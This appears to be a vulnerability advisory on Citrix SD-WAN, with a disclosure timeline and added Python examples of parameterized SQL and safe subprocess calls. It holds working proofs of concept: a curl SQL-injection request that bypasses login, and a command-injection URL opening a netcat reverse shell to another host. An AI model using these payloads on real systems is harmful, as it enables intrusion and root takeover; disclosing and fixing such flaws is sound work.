### Synopsis

Multiple vulnerabilities were discovered in the Citrix SD-WAN appliance. By exploiting the vulnerabilities in combination, a remote, unauthenticated attacker can gain root access.

#### Unauthenticated SQL Injection: /sdwan/nitro/v1/config/get_package_file

The cgi-bin/sdwanrestapi/getpackagefile.cgi Perl script contains a SQL injection vulnerability that can be exploited by a remote, unauthenticated attacker. Input validation is not applied before incorporating user input in a SQL query. By exploiting this vulnerability with a crafted HTTP request, an attacker is able to write to (and create) files in locations writable by the 'mysql' user. For instance, a file can be created in the /tmp directory. A SQL injection payload can be constructed in such a way that the attacker is able to completely bypass the authentication mechanism by writing a token file to the /tmp directory.

The SQL injection vulnerability can be triggered by crafting the HTTP POST request such that:

- An HTTP header 'SSL_CLIENT_VERIFY' is set with the value 'SUCCESS'
- The query string is '?action=file_download'
- Content-Type is 'application/json'
- The POST data is JSON containing the SQL injection payload in the 'site_name' field

Below is the vulnerable code (lines 175-179 of the script). However, there are other vulnerable queries:

```
if($package_type eq "active"){
    $query = "SELECT observed_sw_revision, appliance_name, expected_sw_revision, package_file_name from Network_Appliance_Active " .
             "WHERE site_name ='" . $site_name_arg . "' AND " .
             "appliance_id=" . $appliance_id_arg.";";
}
```

##### Proof of Concept

In the curl command below, a token file will be created at /tmp/token_01234.
```
curl --insecure -H 'SSL_CLIENT_VERIFY: SUCCESS' -H 'Content-Type: application/json' -d '{"get_package_file": {"site_name": "blah'"' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_01234';#\""',"appliance_type": "primary","package_type": "active"}}' https://192.168.1.212/sdwan/nitro/v1/config/get_package_file?action=file_download
```

Next, visit this address in a web browser. You should be logged in:

```
https://192.168.1.212/cgi-bin/vwdash.cgi?swc-token=01234
```

#### Authenticated Command Injection: /cgi-bin/installpatch.cgi

The installpatch.cgi script suffers from a command injection vulnerability. This vulnerability can be exploited by a remote, authenticated attacker to execute OS commands with root privileges. Specifically, the 'installfile' parameter value is not validated prior to using it in a call to the Perl system() function.

##### Proof of Concept

After having bypassed authentication, visit this URL:

```
https://192.168.1.212/cgi-bin/installpatch.cgi?swc-token=01234&installfile=`sudo%20nc%20-nv%20192.168.1.191%204444%20-e%20/bin/bash`
```

### Solution

Upgrade to version 10.2.3.

### Disclosure Timeline

- 05/23/2019 - Tenable discloses vulnerabilities to Citrix. 90-day date is August 21, 2019.
- 05/24/2019 - Citrix has opened a case to investigate.
- 06/04/2019 - Tenable asks for an update.
- 06/04/2019 - Citrix confirms the bugs. They intend to patch before the 90-day date.
- 06/05/2019 - Tenable thanks Citrix for the update.
- 06/11/2019 - Tenable notices 10.2.3 was just released. Asks Citrix if these bugs were fixed because we can't download the new version successfully.
- 06/12/2019 - Response from Citrix: "Citrix will publish which versions have relevant fixes when we publish our Security Bulletin with respect to your findings and these issues." Citrix also reconfirms disclosure date.
- 06/18/2019 - Tenable asks for an update.
- 06/18/2019 - Citrix says they are on schedule to release a patch by the 90-day date.
- 06/18/2019 - Tenable thanks Citrix.
We will continue to follow up periodically.
- 06/26/2019 - Citrix advises that they are planning to release a public bulletin within the next two weeks. They hope to have a more specific date in the next few days. Asks Tenable how to give credit.
- 06/27/2019 - Tenable acknowledges. Asks to be updated when a more specific date is decided on. Credit looks good. Asks about CVE identifiers and the patched version number.
- 07/02/2019 - Tenable asks for an update.
- 07/02/2019 - Tenable notices that version 10.2.3 patches all issues. Advisory released.
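The defect in the getpackagefile.cgi query above is plain string concatenation of request values into SQL text. The following is an added example, not code from the Tenable advisory or from the Citrix appliance: it rebuilds that concatenated query in Python over an in-memory SQLite table and places it beside a parameterized version. The table name and column names are taken from the advisory's Perl snippet; the rows and the probe input are constructed sample data, and the Perl DBI remark in the comments describes the equivalent fix in the script's own language.

```python
"""Added example (not the advisory's or the appliance's code): the
concatenated query from getpackagefile.cgi rebuilt over SQLite, next to a
parameterized lookup. Table and column names come from the advisory's Perl
snippet; rows are constructed sample data."""
import sqlite3

COLUMNS = "observed_sw_revision, appliance_name, expected_sw_revision, package_file_name"

# Constructed sample rows: (site_name, appliance_id, appliance_name,
# observed_sw_revision, expected_sw_revision, package_file_name)
SAMPLE_ROWS = [
    ("site_a", 1, "site_a-primary", "10.2.2", "10.2.3", "site_a_pkg.zip"),
    ("site_b", 2, "site_b-primary", "10.2.2", "10.2.3", "site_b_pkg.zip"),
]


def make_db():
    """Create the in-memory table the two lookups below run against."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Network_Appliance_Active ("
        "site_name TEXT, appliance_id INTEGER, appliance_name TEXT, "
        "observed_sw_revision TEXT, expected_sw_revision TEXT, package_file_name TEXT)"
    )
    conn.executemany(
        "INSERT INTO Network_Appliance_Active VALUES (?, ?, ?, ?, ?, ?)", SAMPLE_ROWS
    )
    return conn


def vulnerable_lookup(conn, site_name, appliance_id):
    """Same construction as the Perl: both request values are pasted into the
    SQL text, so a quote character in site_name changes the statement."""
    query = (
        "SELECT " + COLUMNS + " FROM Network_Appliance_Active "
        "WHERE site_name ='" + site_name + "' AND "
        "appliance_id=" + appliance_id + ";"
    )
    return conn.execute(query).fetchall()


def valid_appliance_id(value):
    """appliance_id is numeric in the schema: accept only an unsigned integer string."""
    return isinstance(value, str) and value.isdigit()


def safe_lookup(conn, site_name, appliance_id):
    """Hardened form: validate the numeric field, then bind both values with
    placeholders so the driver sends them separately from the SQL text.
    Perl DBI gives the same through '?' placeholders with prepare()/execute()."""
    if not valid_appliance_id(appliance_id):
        raise ValueError("appliance_id must be an unsigned integer")
    return conn.execute(
        "SELECT " + COLUMNS + " FROM Network_Appliance_Active "
        "WHERE site_name = ? AND appliance_id = ?",
        (site_name, int(appliance_id)),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "x' OR '1'='1' --"  # constructed input: a quote plus a comment marker
    print("concatenated query returned", len(vulnerable_lookup(db, probe, "1")), "rows")
    print("parameterized query returned", len(safe_lookup(db, probe, "1")), "rows")
```

With the probe value the concatenated query returns every row because the closing quote ends the literal and the comment marker discards the rest of the WHERE clause, while the parameterized query treats the whole value as a site name and matches nothing. Binding values is the fix for all of the script's queries, not only the one quoted in the advisory; the remaining occurrences need the same treatment.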
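The installpatch.cgi issue is the other classic input-handling failure on this page: a request parameter reaches a shell through system(). The block below is an added example, not code from the Tenable advisory or from the Citrix appliance, showing the two controls that keep a value like 'installfile' out of shell interpretation: an allowlist on the file name and an argv-list subprocess call, which is the equivalent of Perl's list-form system(). The name pattern is an assumption for illustration, and the command run is a harmless stand-in ('echo') so the example runs anywhere.

```python
"""Added example (not the advisory's or the appliance's code): allowlist
validation of a patch file name plus an argv-list subprocess call. The
pattern below is an assumed policy, and 'echo' stands in for the real
installer so the block runs on any system."""
import re
import subprocess

# Plain file names only: alphanumerics, dot, underscore and hyphen, no leading
# dot, no path separators, whitespace, quotes, backticks or other metacharacters.
INSTALLFILE_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def valid_installfile(name):
    """True only when the whole string matches the allowlist pattern."""
    return isinstance(name, str) and INSTALLFILE_RE.fullmatch(name) is not None


def install_patch(installfile):
    """Return the stand-in command's output for an accepted name, or None
    when the name is rejected. No shell is involved: the argv list hands the
    name to the program as a single argument, whatever characters it holds."""
    if not valid_installfile(installfile):
        return None
    result = subprocess.run(
        ["echo", installfile], capture_output=True, text=True, check=True
    )
    return result.stdout.rstrip("\n")


if __name__ == "__main__":
    # Constructed test names: one acceptable, three that must be rejected.
    for name in ("sdwan-10.2.3.tgz", "patch.tgz`id`", "../etc/passwd", ".hidden"):
        print(repr(name), "->", install_patch(name))
```

Either control alone is weaker than both together: the argv list stops the shell from ever parsing the value, and the allowlist stops a rejected name from reaching the installer at all, which also closes off path traversal that a list-form call would not prevent on its own.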